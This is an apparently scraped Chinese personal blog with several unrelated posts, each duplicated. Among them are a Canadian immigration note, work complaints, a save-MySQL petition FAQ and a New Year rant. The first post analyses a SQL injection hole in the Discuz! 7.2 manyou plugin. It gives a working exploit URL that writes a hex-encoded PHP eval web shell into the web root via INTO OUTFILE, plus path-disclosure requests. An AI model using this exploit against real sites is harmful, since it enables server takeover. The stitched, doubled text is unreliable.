冬天来了,春天还会远吗? 
来源:http://hacknote.com/read/?...
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。
漏洞分析:
文件./manyou/sources/notice.php
相关代码:
if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']); //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}
很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E是的十六进制表示。
但想
into outfile的话,我们还得有web的物理路径,这在php的情况下并不难得到。
/manyou/admincp.php?my_suffix=%0A%0DTOBY57
/manyou/userapp.php?%0D%0A=TOBY57
这样就事具备,只差outfile了。
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。
漏洞分析:
文件./manyou/sources/notice.php
相关代码:
if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']); //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}
很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E是的十六进制表示。
但想
into outfile的话,我们还得有web的物理路径,这在php的情况下并不难得到。
/manyou/admincp.php?my_suffix=%0A%0DTOBY57
/manyou/userapp.php?%0D%0A=TOBY57
这样就事具备,只差outfile了。
500W啊,1000W啊.....
你以为是中彩票么? No~No!
这是加拿大国籍,即投资移民的资本,以上数字单位为 RMB.
嗯. 不知道从哪里来的哪门子兴趣,想要了解下移民的情况...结果,这倒好...
受了打击了....
给大家介绍一下吧,
投资移民,咱们中国的情况是.
要80万加币,约合人民币500w左右的合法资产及证明.
然后,其余的事情交给中介.然后有个条件是2选1的
要么,拿出40w加币,存入移民局指定帐户,无息存5年.
要么,拿出12w加币,缴纳利息.
------------------------------------------------------------------
他们说这个价格要涨了. 有的说,具体涨多少不一定,有的说,要涨到1000w....天知道
这事儿得问移民局了....
哎..什么时候我也能离开这个水深火热的地方呢?
得...有了目标了....! 好好干吧!
你以为是中彩票么? No~No!
这是加拿大国籍,即投资移民的资本,以上数字单位为 RMB.
嗯. 不知道从哪里来的哪门子兴趣,想要了解下移民的情况...结果,这倒好...
受了打击了....
给大家介绍一下吧,
投资移民,咱们中国的情况是.
要80万加币,约合人民币500w左右的合法资产及证明.
然后,其余的事情交给中介.然后有个条件是2选1的
要么,拿出40w加币,存入移民局指定帐户,无息存5年.
要么,拿出12w加币,缴纳利息.
------------------------------------------------------------------
他们说这个价格要涨了. 有的说,具体涨多少不一定,有的说,要涨到1000w....天知道
这事儿得问移民局了....
哎..什么时候我也能离开这个水深火热的地方呢?
得...有了目标了....! 好好干吧!
首先,恳请各位观众,不要看到这个标题开始胡思乱想...
---------------------------------我不是邪恶的分割线---------------------------------------------
工作了,忙起来了,废话少了许多. 我的工作也涉及到我最讨厌的->模板设计
说来话长了....
公司要做网站,程序自然要用开源的啦... 节省许多开发时间(本来就没开发嘛) 可是,棘手的模版又出现在我的面前.
想想之前的EasyCo,那套程序的模版里的html语法有好多错误. 好在现在的浏览器容错较强. 哎.我还能说什么呢?
其实起初我并不是那么喜欢在我现在的这家公司的. 有些时候是没办法,一个个棘手的问题出现了. 还得一个个搞定. 不过也值得,最起码..学到了东西嘛. 说实话我都不敢想....
总是有些人匆匆走过,我也走过了一个时期. 今年就23了,狗屁都不会干(自私无聊爱慕虚荣人还挺贱). 我实在想不出我除了写php还会干啥了. 而现在呢?
公司的电子屏-----这个我要维护
公司的月报--------也得我出
公司的站-----------我和另一个同事一起做
公司的网络维护-----这个是我的活儿
公司的信息安全-----是我负责,可是我无从下手
一些事情,很容易就让你纠结的蛋疼...(如果你没有蛋,那你mimi疼)
(这会儿正在拼凑一些记忆)
干吗要搞那么痛苦呢?
自从到了公司,手上的私活儿,飞了不少. 在这家公司越久,越发觉假..虚伪.各种人类本性的邪恶统统暴露在我眼前.
其实没有什么大不了的,我们本来就是生活在水深火热的地方.
也没什么可好奇的.
因为...
大家都是--------马勒戈壁大草原上的草泥马.
有时,我总是如此. 在看似毫无逻辑且部分段落且一堆废话中描述着我的思想. 生活本来就是这样. 匆匆走过...
最后一次探望她....她已经快不行了...直到几日前收到她同学发来的短信...眼睛泛起了点点泪水.
这个世界太多无奈.其实...只需要某个官儿,把包二奶的钱拿出来一点就能救了人家的命..
她男朋友坚持要和她举行婚礼.天知道是否会如期进行...
额...我是不是跑远了?
(..........省略n字.以免被河蟹吃掉)
最后一次和另一个她谈话,还是上个月的事情了,她问我以后有啥打算.
..还有啥打算... 拼命赚钱,攒钱,离开这个水深火热的地方.
嗯. 这个世界太多虚伪.
所以我要伪装好自己.
那个丹走了,离开了安阳,我TMD终于可算清静了. 接下来要做的,就是将时间安排好.快快乐乐的做完这一年.(俺签了1年合同)之后的事儿.看看再说了. 如果真的可以考虑.再来一年...总之....我必须怎样怎样? 自己说给自己吧..
总会有人匆匆走过..3月..离职的季节,公司走了很多...也来了很多.
可是.我却快乐不起来.虽然这种情绪不会带入工作.可是融入生活本身就够累的了.整天还要虚伪的,像个傻逼似的笑,就如同一帮疯子吸了大麻一样. 他娘的!
还好..我现在还能受得了..倘若我真的受不了..我相信有天我会爆发的!
---------------------------------我不是邪恶的分割线---------------------------------------------
工作了,忙起来了,废话少了许多. 我的工作也涉及到我最讨厌的->模板设计
说来话长了....
公司要做网站,程序自然要用开源的啦... 节省许多开发时间(本来就没开发嘛) 可是,棘手的模版又出现在我的面前.
想想之前的EasyCo,那套程序的模版里的html语法有好多错误. 好在现在的浏览器容错较强. 哎.我还能说什么呢?
其实起初我并不是那么喜欢在我现在的这家公司的. 有些时候是没办法,一个个棘手的问题出现了. 还得一个个搞定. 不过也值得,最起码..学到了东西嘛. 说实话我都不敢想....
总是有些人匆匆走过,我也走过了一个时期. 今年就23了,狗屁都不会干(自私无聊爱慕虚荣人还挺贱). 我实在想不出我除了写php还会干啥了. 而现在呢?
公司的电子屏-----这个我要维护
公司的月报--------也得我出
公司的站-----------我和另一个同事一起做
公司的网络维护-----这个是我的活儿
公司的信息安全-----是我负责,可是我无从下手
一些事情,很容易就让你纠结的蛋疼...(如果你没有蛋,那你mimi疼)
(这会儿正在拼凑一些记忆)
干吗要搞那么痛苦呢?
自从到了公司,手上的私活儿,飞了不少. 在这家公司越久,越发觉假..虚伪.各种人类本性的邪恶统统暴露在我眼前.
其实没有什么大不了的,我们本来就是生活在水深火热的地方.
也没什么可好奇的.
因为...
大家都是--------马勒戈壁大草原上的草泥马.
有时,我总是如此. 在看似毫无逻辑且部分段落且一堆废话中描述着我的思想. 生活本来就是这样. 匆匆走过...
最后一次探望她....她已经快不行了...直到几日前收到她同学发来的短信...眼睛泛起了点点泪水.
这个世界太多无奈.其实...只需要某个官儿,把包二奶的钱拿出来一点就能救了人家的命..
她男朋友坚持要和她举行婚礼.天知道是否会如期进行...
额...我是不是跑远了?
(..........省略n字.以免被河蟹吃掉)
最后一次和另一个她谈话,还是上个月的事情了,她问我以后有啥打算.
..还有啥打算... 拼命赚钱,攒钱,离开这个水深火热的地方.
嗯. 这个世界太多虚伪.
所以我要伪装好自己.
那个丹走了,离开了安阳,我TMD终于可算清静了. 接下来要做的,就是将时间安排好.快快乐乐的做完这一年.(俺签了1年合同)之后的事儿.看看再说了. 如果真的可以考虑.再来一年...总之....我必须怎样怎样? 自己说给自己吧..
总会有人匆匆走过..3月..离职的季节,公司走了很多...也来了很多.
可是.我却快乐不起来.虽然这种情绪不会带入工作.可是融入生活本身就够累的了.整天还要虚伪的,像个傻逼似的笑,就如同一帮疯子吸了大麻一样. 他娘的!
还好..我现在还能受得了..倘若我真的受不了..我相信有天我会爆发的!
阻止Oracle收购Sun,在欧盟似乎已决定批准这项70亿美元的收购案之后,MySQL数据库创始人开始寻求中国和俄罗斯帮助。
在一封给中国 MySQL用户的邮件中写道 “亲爱的拯救MySQL的中国签名支持者,欧盟可能无法拯救MySQL, 中国和俄罗斯可能是拯救MySQL的希望之所在。中国拥有强大、独立以及自信的反垄断主管机关,因此,我本人在此请求您的帮助。对于您的签名,我们深表感谢。如果可以的话,我们需要您的进一步帮助……”
下面是具体的参与方法
点击这个链接并且填写自己的信息提交即可
http://helpmysql.org/cn/pe...
FAQ:
----------------------------------
我们还有多少时间?
时间紧迫,但您仍然可以帮上忙。如果已经太晚(不论好还是坏),我们将立即停用请愿书,并在本网站每一页面上公布结果。
在我们通知您之前,请不要相信已经结束的任何说法。这些说法可能是试图破坏本次活动的某些人散布的。
本次活动网站于2009年12月28日启动。我们越早赢得大量支持者越好。关键的日期是2010年1月4日。那一天(明年的第一个工作日)我们计划 正式向监管者、其他政府机构、议会和记者提交请愿书。之后,我们将继续收集支持,直到程序结束,而且表示持续的支持也很重要。我们可能在2010年1月或 者可能2月份进行请愿书的多次提交。
活动为何是全球性的?
甲骨文需要在全球所有主要市场取得审批。因此,我们将在世界不同地区提交请愿书。
一般而言,监管者会把数据库市场的地理范围界定为全球性的。只要想想MySQL,显然就明白了:人们可以在全球各地下载或获取MySQL,并在各地使用它。因此,您的签名支持甚至会到达您的国家以外的世界其他地方的监管者面前。
我们需要多少签名才能成功?
没有特定限值。这不是事先就知道100,000签名者就能启动政治程序(根据某些法律)的请愿。这是有关MySQL用户的关注和希望达成令MySQL今后独立于甲骨文的真正解决方案(或者至少依赖程度更小)的表达。
这不仅仅是关于绝对数字的问题,而是如何能尽快签字,而且签字是否始终以较高速度增长的问题。您越快签字,越快让其他人知道就越好。
如何处理我的数据?我能相信你吗?
我们知道如您支持本次活动那么您就信任我们,我们将证明我们是值得信赖的。
我们有明确的资料保密声明,请见请愿书页,说明您的数据将只能用于提交请愿书给监管者、其他政府机关、议会和重要、声誉良好的新闻机构记者。如我们向您发送了有关本次活动的信息,您可点击取消链接,这样您将不会收到我们的任何其他电子邮件。
你们如何向监管者、议会和新闻机构提交请愿书?谁会看到请愿书?
有时候请愿书是以打印文件的方式提交,以表明其数量庞大。但是,为了环保考虑,我们可能选择以电子格式提交大多数的请愿书。监管者、议会和重要、著 名的新闻媒体会收到它们,其中附带了不得以任何与本次活动无关的方式使用数据的明确要求,并且,新闻媒体必须签署接收上述要求的文件,并将不被允许从请愿 书中引用任何姓名和其他唯一或范围较窄的识别数据,除非他们从签字人处收到书面明示许可(包括电子邮件方式),允许在报道中提及。
处理本次案件的监管者将把请愿书放入甲骨文/太阳微电子案卷中。对于查看该卷宗有特殊的规定。例如,欧盟甲骨文律师当然会有权看到请愿书。因此,有必要让请愿书具有真正的震撼效果。
我们不要求请愿书中提供任何特殊的敏感信息,如您决定填写其中内容的,我们也不希望您在公共或私人评论字段中提供任何敏感信息。
如何能最有效地帮助请愿成功?
显然最好的第一步就是您在请愿书上签字。
在帮助倡议 部分,您可找到进一步说明和材料,以及在网站上设置的标语。
我们相信您知道其他专业的MySQL用户,并且有办法鼓励他们在请愿书上签字。
我需要现在亲自写信给欧盟吗?或者写信给本国的反垄断机构或议会,例如欧洲议会?
我们认为本次活动将产生大量的回复,当然对于各个机构而言处理完整的请愿书更加容易一些。我们尽可能通过互联网进行号召,包括通过电子邮件,除非通过直接联系能够取得明显不同的良好效果。
如果您可以代表10名或以上员工规模的公司发言,并且MySQL对贵公司很重要,或者如果您可以代表100名或以上员工规模的公司发言,而且贵公司 把MySQL用于重大业务目的,请联系贵国反垄断机构,并表达您关于甲骨文收购MySQL计划的关注。如您需要任何帮助,请使用联系表向我们提问。
在一封给中国 MySQL用户的邮件中写道 “亲爱的拯救MySQL的中国签名支持者,欧盟可能无法拯救MySQL, 中国和俄罗斯可能是拯救MySQL的希望之所在。中国拥有强大、独立以及自信的反垄断主管机关,因此,我本人在此请求您的帮助。对于您的签名,我们深表感谢。如果可以的话,我们需要您的进一步帮助……”
下面是具体的参与方法
点击这个链接并且填写自己的信息提交即可
http://helpmysql.org/cn/pe...
FAQ:
----------------------------------
我们还有多少时间?
时间紧迫,但您仍然可以帮上忙。如果已经太晚(不论好还是坏),我们将立即停用请愿书,并在本网站每一页面上公布结果。
在我们通知您之前,请不要相信已经结束的任何说法。这些说法可能是试图破坏本次活动的某些人散布的。
本次活动网站于2009年12月28日启动。我们越早赢得大量支持者越好。关键的日期是2010年1月4日。那一天(明年的第一个工作日)我们计划 正式向监管者、其他政府机构、议会和记者提交请愿书。之后,我们将继续收集支持,直到程序结束,而且表示持续的支持也很重要。我们可能在2010年1月或 者可能2月份进行请愿书的多次提交。
活动为何是全球性的?
甲骨文需要在全球所有主要市场取得审批。因此,我们将在世界不同地区提交请愿书。
一般而言,监管者会把数据库市场的地理范围界定为全球性的。只要想想MySQL,显然就明白了:人们可以在全球各地下载或获取MySQL,并在各地使用它。因此,您的签名支持甚至会到达您的国家以外的世界其他地方的监管者面前。
我们需要多少签名才能成功?
没有特定限值。这不是事先就知道100,000签名者就能启动政治程序(根据某些法律)的请愿。这是有关MySQL用户的关注和希望达成令MySQL今后独立于甲骨文的真正解决方案(或者至少依赖程度更小)的表达。
这不仅仅是关于绝对数字的问题,而是如何能尽快签字,而且签字是否始终以较高速度增长的问题。您越快签字,越快让其他人知道就越好。
如何处理我的数据?我能相信你吗?
我们知道如您支持本次活动那么您就信任我们,我们将证明我们是值得信赖的。
我们有明确的资料保密声明,请见请愿书页,说明您的数据将只能用于提交请愿书给监管者、其他政府机关、议会和重要、声誉良好的新闻机构记者。如我们向您发送了有关本次活动的信息,您可点击取消链接,这样您将不会收到我们的任何其他电子邮件。
你们如何向监管者、议会和新闻机构提交请愿书?谁会看到请愿书?
有时候请愿书是以打印文件的方式提交,以表明其数量庞大。但是,为了环保考虑,我们可能选择以电子格式提交大多数的请愿书。监管者、议会和重要、著 名的新闻媒体会收到它们,其中附带了不得以任何与本次活动无关的方式使用数据的明确要求,并且,新闻媒体必须签署接收上述要求的文件,并将不被允许从请愿 书中引用任何姓名和其他唯一或范围较窄的识别数据,除非他们从签字人处收到书面明示许可(包括电子邮件方式),允许在报道中提及。
处理本次案件的监管者将把请愿书放入甲骨文/太阳微电子案卷中。对于查看该卷宗有特殊的规定。例如,欧盟甲骨文律师当然会有权看到请愿书。因此,有必要让请愿书具有真正的震撼效果。
我们不要求请愿书中提供任何特殊的敏感信息,如您决定填写其中内容的,我们也不希望您在公共或私人评论字段中提供任何敏感信息。
如何能最有效地帮助请愿成功?
显然最好的第一步就是您在请愿书上签字。
在帮助倡议 部分,您可找到进一步说明和材料,以及在网站上设置的标语。
我们相信您知道其他专业的MySQL用户,并且有办法鼓励他们在请愿书上签字。
我需要现在亲自写信给欧盟吗?或者写信给本国的反垄断机构或议会,例如欧洲议会?
我们认为本次活动将产生大量的回复,当然对于各个机构而言处理完整的请愿书更加容易一些。我们尽可能通过互联网进行号召,包括通过电子邮件,除非通过直接联系能够取得明显不同的良好效果。
如果您可以代表10名或以上员工规模的公司发言,并且MySQL对贵公司很重要,或者如果您可以代表100名或以上员工规模的公司发言,而且贵公司 把MySQL用于重大业务目的,请联系贵国反垄断机构,并表达您关于甲骨文收购MySQL计划的关注。如您需要任何帮助,请使用联系表向我们提问。
过年了...真的是"年"!
过的真累...还不如上班.义务加班我也乐意!
总之----过年没意思,无聊,扯蛋,春晚像SB,怪不得CCTV官方被黑,自找抽的!
总算过年了,我的php学习可以继续了,但..还不免在这段时间有所娱乐不是?
本来盘算着和哥们儿去买个200大洋的 "擦炮" 然后放个痛快..想想吧..太奢侈了.
得. 看完了"金刚葫芦娃"就是"葫芦小金刚"的续集. 然后,下了N个游戏都被"QQ5刀吭他娘"给绑定了IE.
在网上差了半天没有结果,最后...最后TMD老子自己提权日它的表,日它的dll,日它的绑定! nnd,总算搞定!
居然在IE的表里Main项里留下了那鸟人的QQ.
具体方法,我不贴了,自以为牛逼的SB自己TMD去搞吧!免得老子贴出来你们再改错了!
需要干掉QQ5绑定的可以和我联系. 我乐意义务点对点服务~ hoho~
N个游戏,win7下...N个不能玩. 不能玩咋整啊..删...最后能玩的就剩下Quake 4了.
也不错,雷神4...还是很棒的. hoho~
这个假期没算胡B,不浪费. 有个老外TMD人家做剩的单来找我,一番讨价还价之后....我不打算做了. 免得在之前的代码基础上修改..继续开发...又出问题...又棘手...还没多少钱..
过个毛节啊,一点气氛都没有,放炮...TMD放屁! 都扯! 纠结了一年的SB又出来纠结来了! nnd!
CCTV还没看出来吗? 都是做广告的! 难怪赵本山吃了那么多药继续肾亏和尿毒+尿糖!
赵本山越来越流氓了,哎,快死的人了,不说也罢..你看看董卿,动不动就摸摸大腿,好像裤裆x着跳蛋似的.还有,如果我是汇源老总,"丫没洗手,你丫没洗脸吧!" 然后挡住镜头,TMD,这个节目我买的.你们都自己想去吧. 哈哈哈哈..
.... 额,我也越来越脏话连篇了....哎,这都是跟CCTV学的. 你说CCTV能不扯蛋么?
哎...广告,哎...疗效,哎...神奇...哎......扯!
看看人家牛B哄哄上访的,河南卫视就敢报道,人家新闻联播也连个屁都不敢放. 主要内容大概是某个专门上访的,哪个部门都顺利,就政府部门....可能是政府部门审核比较严格吧...详情请咨询河南电视台.
好了好了,大过年的.扯完了睡. 睡起来了吃..吃完了扯,扯完了接着睡..... 你说这样的生活能不累吗?
过的真累...还不如上班.义务加班我也乐意!
总之----过年没意思,无聊,扯蛋,春晚像SB,怪不得CCTV官方被黑,自找抽的!
总算过年了,我的php学习可以继续了,但..还不免在这段时间有所娱乐不是?
本来盘算着和哥们儿去买个200大洋的 "擦炮" 然后放个痛快..想想吧..太奢侈了.
得. 看完了"金刚葫芦娃"就是"葫芦小金刚"的续集. 然后,下了N个游戏都被"QQ5刀吭他娘"给绑定了IE.
在网上差了半天没有结果,最后...最后TMD老子自己提权日它的表,日它的dll,日它的绑定! nnd,总算搞定!
居然在IE的表里Main项里留下了那鸟人的QQ.
具体方法,我不贴了,自以为牛逼的SB自己TMD去搞吧!免得老子贴出来你们再改错了!
需要干掉QQ5绑定的可以和我联系. 我乐意义务点对点服务~ hoho~
N个游戏,win7下...N个不能玩. 不能玩咋整啊..删...最后能玩的就剩下Quake 4了.
也不错,雷神4...还是很棒的. hoho~
这个假期没算胡B,不浪费. 有个老外TMD人家做剩的单来找我,一番讨价还价之后....我不打算做了. 免得在之前的代码基础上修改..继续开发...又出问题...又棘手...还没多少钱..
过个毛节啊,一点气氛都没有,放炮...TMD放屁! 都扯! 纠结了一年的SB又出来纠结来了! nnd!
CCTV还没看出来吗? 都是做广告的! 难怪赵本山吃了那么多药继续肾亏和尿毒+尿糖!
赵本山越来越流氓了,哎,快死的人了,不说也罢..你看看董卿,动不动就摸摸大腿,好像裤裆x着跳蛋似的.还有,如果我是汇源老总,"丫没洗手,你丫没洗脸吧!" 然后挡住镜头,TMD,这个节目我买的.你们都自己想去吧. 哈哈哈哈..
.... 额,我也越来越脏话连篇了....哎,这都是跟CCTV学的. 你说CCTV能不扯蛋么?
哎...广告,哎...疗效,哎...神奇...哎......扯!
看看人家牛B哄哄上访的,河南卫视就敢报道,人家新闻联播也连个屁都不敢放. 主要内容大概是某个专门上访的,哪个部门都顺利,就政府部门....可能是政府部门审核比较严格吧...详情请咨询河南电视台.
好了好了,大过年的.扯完了睡. 睡起来了吃..吃完了扯,扯完了接着睡..... 你说这样的生活能不累吗?
